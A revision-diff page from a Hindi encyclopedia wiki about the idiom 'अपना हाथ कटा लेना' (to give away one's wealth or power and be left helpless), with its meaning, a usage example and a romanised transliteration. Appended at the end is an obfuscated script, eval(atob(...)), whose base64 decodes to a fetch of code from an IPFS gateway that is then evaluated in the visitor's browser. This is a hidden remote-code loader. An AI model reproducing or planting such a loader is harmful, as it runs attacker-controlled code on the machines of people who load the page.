Difference between revisions of "अपना हाथ कटा लेना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अड़चन आ पड़ना''' एक प्रचलित कहावत लोकोक्ति मुहावर...' के साथ नया पृष्ठ बनाया)
 
m (Text replacement - "{{कहावत लोकोक्ति मुहावरे}}" to "{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
'''अड़चन आ पड़ना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
+
'''अपना हाथ कटा लेना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
  
'''अर्थ'''- अपनी धन - संपत्ति या शक्ति दूसरों को दे बैठना (फलतः स्वयं विवश हो जाना)।
+
'''अर्थ'''- अपनी धन-संपत्ति या शक्ति दूसरों को दे बैठना (फलतः स्वयं विवश हो जाना)।
  
'''प्रयोग'''- बीवी के हाथ सारी पूँजी देकर अपना हाथ कटा चुके हैं वे। रा. रा. प्र. सिंह।
+
'''प्रयोग'''- बीवी के हाथ सारी पूँजी देकर अपना हाथ कटा चुके हैं वे। ...(राजा राधिकारमण प्रसाध सिंह)
 
   
 
   
  
Line 10: Line 10:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{कहावत लोकोक्ति मुहावरे}}
+
{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}
 
[[Category:हिन्दी मुहावरे एवं लोकोक्ति कोश]]
 
[[Category:हिन्दी मुहावरे एवं लोकोक्ति कोश]]
 
[[Category:कहावत लोकोक्ति मुहावरे]]
 
[[Category:कहावत लोकोक्ति मुहावरे]]
 
[[Category:साहित्य कोश]]
 
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:12, 20 April 2018

apana hath kata lena ek prachalit lokokti athava hindi muhavara hai.

arth- apani dhan-sanpatti ya shakti doosaroan ko de baithana (phalatah svayan vivash ho jana).

prayog- bivi ke hath sari pooanji dekar apana hath kata chuke haian ve. ...(raja radhikaraman prasadh sianh)


tika tippani aur sandarbh

sanbandhit lekh

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>